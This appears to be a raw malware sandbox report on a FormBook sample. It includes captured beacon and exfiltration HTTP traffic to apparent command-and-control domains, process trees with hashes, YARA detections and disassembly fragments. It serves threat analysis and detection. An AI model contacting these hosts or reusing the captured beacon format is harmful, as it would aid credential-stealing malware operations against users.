                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:36:45.914990902 CET | 567 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:45 GMT
                                                                                                                                                            Location: https://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HK3o+HppIUB4jPHNr8oJc0/dyFD8r5IhzQkmiC+XTwnzrQ%3D%3D&TTd=yRNPZBU8fZA
                                                                                                                                                            Server: ESF
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 53759 | 172.81.61.224 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:51.174268007 CET | 803 | OUT | POST /d5je/ HTTP/1.1
                                                                                                                                                            Host: www.moritynomxd.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.moritynomxd.xyz
                                                                                                                                                            Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=uqt03LPwgzKGS19k85I7BLgeBcqzfeHG6Mo2DScWuR9iDwHPiJ5OGuayqfTPA5MgIXEEyBgn/OxocL1m5fR/iTxjpDNASF/CtQwMP35LIMeYqw8mWqerdazLK2Gugc2a0BvH7d0Sme6nzLHc+HMmJtxFMnuIaZGZ1T8imQz7eNvGerkz8W+wxDdzHTNoBNXdIyL79aI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 53760 | 172.81.61.224 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:53.786096096 CET | 823 | OUT | POST /d5je/ HTTP/1.1
                                                                                                                                                            Host: www.moritynomxd.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.moritynomxd.xyz
                                                                                                                                                            Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=uqt03LPwgzKGSUtk6ek7JLgRP8qzR+HK6Mk2DQw4uCJiDQ3PwdtODuay+PSEOZMrIX4MyBsn/OlocLFm6oF4hjxhyzNCfl/CtQwMP2JxIMGYqAsmR+KsT6zIdGGu3M2G0Bvl7dE4mcynzO7c+TYhQdxHRXvpKbzXyTUVsg//fsf5bdJZm022yD1YHQleE6K1SRbLjNds+i7UUaBuz3TBaBXLPGMO


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 53761 | 172.81.61.224 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:56.335053921 CET | 1840 | OUT | POST /d5je/ HTTP/1.1
                                                                                                                                                            Host: www.moritynomxd.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.moritynomxd.xyz
                                                                                                                                                            Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: mnYxMt= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 53762 | 172.81.61.224 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:36:58.900525093 CET | 540 | OUT | GET /d5je/?mnYxMt=joFU07nwohD6eVof7LEAc8A6AvX4Xdan1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iBltimhMIjfcvDspXx4VIdueoAIlFt6Qc63ge1Cxn5PIrg==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.moritynomxd.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 53763 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:37:12.427748919 CET | 794 | OUT | POST /h8b0/ HTTP/1.1
                                                                                                                                                            Host: www.tukaari.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tukaari.shop
                                                                                                                                                            Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=OTk+zmL02FhBYIUK+vPkk91ZTpu4GbXV0DU4LsKiWOIdsT0HejuibrPO0UfYWN7rNHZ6r50fcb5csg+11+bi2ThXkvONLhQdxiIx6FcLKyfbo7vaKvPBa2ES9VLQmizscsUSGQU93aLfyrQ6N18948m5D7maEJzZvCZZmvgJKL7+6gtwBVaJvyXP3vWR4VetKZ6amNk=


Session ID: 50, Source IP: 192.168.2.8, Source Port: 53764, Destination IP: 3.33.130.190, Destination Port: 80, PID: 6320, Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp: Nov 12, 2024 18:37:14.973520994 CET, Bytes transferred: 814, Direction: OUT, Data:
POST /h8b0/ HTTP/1.1
                                                                                                                                                            Host: www.tukaari.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tukaari.shop
                                                                                                                                                            Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=OTk+zmL02FhBK7MK8Mnkjd1YcJu4TLXR0Ec4Ltf6V8cdsyoHfmSicrPO/0fnbt7aNHUHr7QfcYFcslS10NzhwDhVxfOTGBQdxiIx6GgxKynbounaY93GZ2EV6VLQsCzgcsUwGVNW3cHfyqg6Nk88tsm3H7nzFbrJrTdVi9s1E4LMy2Aab3SPsy/k3s+n9iDFQ6qq4ayLITZGQACliw6tfGUodFj3


Session ID: 51, Source IP: 192.168.2.8, Source Port: 53765, Destination IP: 3.33.130.190, Destination Port: 80, PID: 6320, Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp: Nov 12, 2024 18:37:17.524045944 CET, Bytes transferred: 1831, Direction: OUT, Data:
POST /h8b0/ HTTP/1.1
                                                                                                                                                            Host: www.tukaari.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tukaari.shop
                                                                                                                                                            Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: mnYxMt= [TRUNCATED]


Session ID: 52, Source IP: 192.168.2.8, Source Port: 53766, Destination IP: 3.33.130.190, Destination Port: 80
Timestamp: Nov 12, 2024 18:37:21.937359095 CET, Bytes transferred: 537, Direction: OUT, Data:
GET /h8b0/?mnYxMt=DRMewQ2K/nAxApdBv9ra6bsCdKq6L6XhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpgUg2JSERF0UkR4bqmVQDFHy6vjAN9/CTn0QkHjb1AS2LQ==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.tukaari.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Timestamp: Nov 12, 2024 18:37:22.562114954 CET, Bytes transferred: 410, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:37:22 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mnYxMt=DRMewQ2K/nAxApdBv9ra6bsCdKq6L6XhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpgUg2JSERF0UkR4bqmVQDFHy6vjAN9/CTn0QkHjb1AS2LQ==&TTd=yRNPZBU8fZA"}</script></head></html>


Session ID: 53, Source IP: 192.168.2.8, Source Port: 53767, Destination IP: 35.156.117.131, Destination Port: 80
Timestamp: Nov 12, 2024 18:37:30.681700945 CET, Bytes transferred: 541, Direction: OUT, Data:
GET /s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ== HTTP/1.1
                                                                                                                                                            Host: www.specialgift.asia
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Timestamp: Nov 12, 2024 18:37:32.004672050 CET, Bytes transferred: 1236, Direction: IN, Data:
HTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:37:31 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Content-Length: 2088
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Status: 404 Not Found
                                                                                                                                                            X-Request-Id: 2978624a8f32ae2f31fda779228655a8
                                                                                                                                                            X-Runtime: 0.027656
                                                                                                                                                            Data Ascii: <html> <head> <title>Page not found - Strikingly</title> <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" /> <link href='https://fonts.googleapis.com/css?family=Montserrat|Open+Sans' rel='stylesheet' type='text/css'> <link href='//assets.strikingly.com/assets/404-styles.css' rel='stylesheet' type='text/css'> ...[if lte IE 7]> <style> .wide { padding-top: 160px; } </style> <![endif]--> <script type="text/javascript"> // Google Analytics (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25124444-6', 'auto'); ga('set', 'anonymizeIp
Timestamp: Nov 12, 2024 18:37:32.004693031 CET, Bytes transferred: 1130, Direction: IN, Data:
                                                                                                                                                            Data Ascii: ', true); ga('send', 'pageview', { 'anonymizeIp': true }); // End Google Analytics </script> </head> <body> <div class='bg-logo'></div> <div class='wide light-text'> <div class='col2'> <h1> PAGE NOT FOUN



                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:12:33:11
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Users\user\Desktop\wavjjT3sEq.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\wavjjT3sEq.exe"
                                                                                                                                                            Imagebase:0x120000
                                                                                                                                                            File size:289'280 bytes
                                                                                                                                                            MD5 hash:EA8D328BA326E4F6C37F0D853F981122
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:12:33:19
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe"
                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:12:33:21
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\mshta.exe"
                                                                                                                                                            Imagebase:0x6c0000
                                                                                                                                                            File size:13'312 bytes
                                                                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:12:33:34
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe"
                                                                                                                                                            Imagebase:0x1000000
                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:12:33:48
                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                            Imagebase:0x7ff6d20e0000
                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true


                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:1.2%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                                                                                              Signature Coverage:13.6%
                                                                                                                                                              Total number of Nodes:132
                                                                                                                                                              Total number of Limit Nodes:11

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 47 137983-13799f 48 1379a7-1379ac 47->48 49 1379a2 call 14f6a3 47->49 50 1379b2-1379c0 call 14fca3 48->50 51 1379ae-1379b1 48->51 49->48 54 1379c2-1379cd call 14ff43 50->54 55 1379d0-1379e1 call 14e023 50->55 54->55 60 1379e3-1379f7 LdrLoadDll 55->60 61 1379fa-1379fd 55->61 60->61
                                                                                                                                                              APIs
                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001379F5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Load
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                              • Opcode ID: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
                                                                                                                                                              • Instruction ID: a115f9663307aee79ab401e78fdfb9c29f493363a1aa3599b5c9ba5979dc5a1a
                                                                                                                                                              • Opcode Fuzzy Hash: 352a911c7d75b054859a4398694d1711e84ed81b6f2a009f0faaad9a1ff4d0c8
                                                                                                                                                              • Instruction Fuzzy Hash: D30121B5E0020DBBDF10DBE4DC42F9DB3B8AB54318F0042A5E90897290F771EB598B91

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 72 14c8b3-14c8ec call 124843 call 14db13 NtClose
                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0014C8E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                                              • Instruction ID: a7e15e46162e6ea32cd5983bea1f69f96633e07062b455dff6db3d061c3b3165
                                                                                                                                                              • Opcode Fuzzy Hash: 1f2e55867fb49e0edbdfca481a993cadd69b59c11f28a48fb14a12efc8519f18
                                                                                                                                                              • Instruction Fuzzy Hash: CCE04F362102147BDA20AA59EC41FDB775CDBC5750F004019FA0DA7282D7B07A1086E1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 86 1962b60-1962b6c LdrInitializeThunk
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3c1bc8fccb3fb1d7272736cf0f9c9b03d16dd65b7695a18d89b3fec152b40d36
                                                                                                                                                              • Instruction ID: 88cdd937a8cd9545f647cf91fed95189d442a3eeaab275bb04f8af9c1128e21c
                                                                                                                                                              • Opcode Fuzzy Hash: 3c1bc8fccb3fb1d7272736cf0f9c9b03d16dd65b7695a18d89b3fec152b40d36
                                                                                                                                                              • Instruction Fuzzy Hash: BE9002612025000341097158441C616804E9BE0201B55C031E1054590DC52589916225

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 88 1962df0-1962dfc LdrInitializeThunk
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: b718d9d7ec66ca47dea8d14403af8c3bf72dd340a34540cb47ce01b1113aa437
                                                                                                                                                              • Instruction ID: 029e9dac7dce4cfb8fe1404899387a03c5af09e565dc05cf1cd320d702fa6585
                                                                                                                                                              • Opcode Fuzzy Hash: b718d9d7ec66ca47dea8d14403af8c3bf72dd340a34540cb47ce01b1113aa437
                                                                                                                                                              • Instruction Fuzzy Hash: 3E90023120150413D1157158450C707404D9BD0241F95C422A0464558DD6568A52A221

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
